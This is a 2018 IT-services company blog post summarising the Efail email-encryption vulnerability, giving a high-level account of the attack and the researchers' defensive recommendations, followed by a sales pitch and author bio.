Encrypted Email Security Flaw

By:  |  Category: Blog, Security Tuesday, May 15th, 2018  |  No Comments
Encrypted Email

Think your business is safe because your emails are encrypted? Maybe not. A security flaw within email encryption looks like it has left a small opening for hackers to read your private messages.

Called Efail by European researchers. the vulnerability doesn’t break email encryption standards like Pretty Good Privacy (PGP), but exploits a flaw from how email clients read HTML codes. While encrypted email keeps your messages secret, email clients see HTML content — for example, images or hyperlinks — and translate them in plain-text, even if there is encrypted content in them. The security flaw allows potential hackers to use that element to expose the most popular email encryption standards, the researchers said.

Sebastian Schinzel, the lead researcher on Efail and a professor of computer security at Münster University of Applied Sciences, said on Twitter that there were “currently no reliable fixes for the vulnerability.”

Fortunately, it’s not an easy hack. The vulnerability requires several steps for an attacker to intercept encrypted emails, but reveals a crack in PGP’s armor. The attacker would have to have access to the encrypted emails to begin with, meaning that the victim’s account would need to be compromised as a starting point.

They then would have to send the contents of that encrypted email back to its owner, the victim, in a carefully crafted way to make email clients think it’s HTML. This needs to be done in three emails, with the first one opening the HTML tag, the second one containing the encrypted message, and the third closing the HTML tag. This alone would be a social engineering con of great magnitude, although it’s never wise to underestimate the skills of a dedicated hacker.

So clients like Apple Mail, iOS Mail and Mozilla Thunderbird would view the emails as HTML instead of an encrypted message, and display it as one plaintext email instead of three hashed messages.

“It’s a lot of steps for sure, and one that honestly is more hypothetical than is it is dangerous,” Dave Kennedy, the chief executive at security company TrustedSec, said.

The attack works for archived encrypted emails as well, not just recent messages.

The researchers recommend:

  • Disabling HTML rendering in your email client to prevent your PGP messages from being decrypted.
  •  Temporarily stop using PGP email plugins, and use non-email based platforms for encrypted messages.

If you need assistance with managed IT security services for your business give EnhnacedTECH a call at 714-970-9330 or contact us at [email protected]

Samantha Keller

Director of Marketing and PR at EnhancedTECH
Samantha Keller (AKA Sam) is a published author, tech-blogger, event-planner and mother of three fabulous humans. Samantha has worked in the IT field for the last fifteen years, intertwining a freelance writing career along with technology sales, events and marketing. She began working for EnhancedTECH ten years ago after earning her Bachelor’s degree from UCLA and attending Fuller Seminary. She is a lover of kickboxing, extra-strong coffee, and Wolfpack football.Her regular blog columns feature upcoming tech trends, cybersecurity tips, and practical solutions geared towards enhancing your business through technology.
Samantha Keller

Latest posts by Samantha Keller (see all)

Leave a Comment
Read previous post:
Password Stealing
Password Stealing Malware on FB Messenger

A variant of malware using fake Facebook Messenger messages to infect other users has re-emerged with new schemes to steal...